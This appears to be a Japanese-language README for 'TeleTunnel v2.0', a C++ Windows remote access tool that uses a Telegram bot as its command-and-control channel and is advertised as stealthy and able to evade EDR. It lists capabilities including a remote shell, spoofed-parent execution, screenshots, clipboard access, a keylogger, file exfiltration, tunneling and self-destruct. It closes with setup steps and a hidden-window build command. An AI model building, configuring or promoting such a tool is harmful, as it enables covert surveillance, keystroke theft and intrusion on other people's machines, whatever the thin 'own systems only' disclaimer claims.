
ステルス的なC++ Telegram BotとTelegram自体をC2インターフェースとして使用してEDRを回避する!
Windows用のTelegramベースのリモートアクセスツール。 免責事項: あなた自身のシステムでの許可された使用のみを対象としています!お願い🙇
ボットには以下の機能があります:
ᴛᴇʟᴇᴛᴜɴɴᴇʟ ᴠ2.0
────────────────────
👤 Identity: USER@HOSTNAME
🛠 ʀᴇᴄᴏɴɴᴀɪssᴀɴᴄᴇ
├── sysinfo - Full system report
├── ss - Desktop capture
├── ps - Process listing
└── ls <path>- Directory browser
⚡️ ᴄᴏᴍᴍᴀɴᴅ ᴄᴇɴᴛᴇʀ
├── > <cmd> - Native shell
├── spawn <PID> <cmd> - Spoofed exec
├── clip get/set - Clipboard manager
└── kill - Self-destruct
💾 ғɪʟᴇ ᴏᴘᴇʀᴀᴛɪᴏɴs
├── get <path> - Download from host
├── [Drag/Drop]- Upload to host
└── drops - List uploads ($1, $LAST)
⌨️ ᴋᴇʏʟᴏɢɢᴇʀ
└── keylog <start|stop|dump|status>
📡 ᴛᴜɴɴᴇʟɪɴɢ
└── open|send|close|streams
────────────────────
nlohmann/json.hppが含まれています。これはリポジトリに含まれているため、わざわざ探す手間が省けます。Telegram Bot Tokenを取得:
@BotFatherにメッセージを送り、新しいボットを作成します。Telegram Chat IDを取得:
@userinfobotにメッセージを送り、正確なユーザーIDを取得します。https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getUpdatesにアクセスして、chatの下にあるidを見つけます。プロジェクトを設定:
config.hを開きます。"YOUR BOT TOKEN HERE"を実際のボットトークンに置き換えます。"XXXXXXXXXX"を自分のTelegramユーザーIDに置き換えます。必要なWindowsライブラリがあることを確認します: wininet、ws2_32、gdiplus、ole32、iphlpapi。
GCC/MinGWを使用する場合:
g++ -std=c++17 -O2 -mwindows -I. -Inlohmann "./TeleTunnel v2.cpp" -o TeleTunnelv2.exe -lwininet -lws2_32 -lgdiplus -lole32 -liphlpapi -static -static-libgcc -static-libstdc++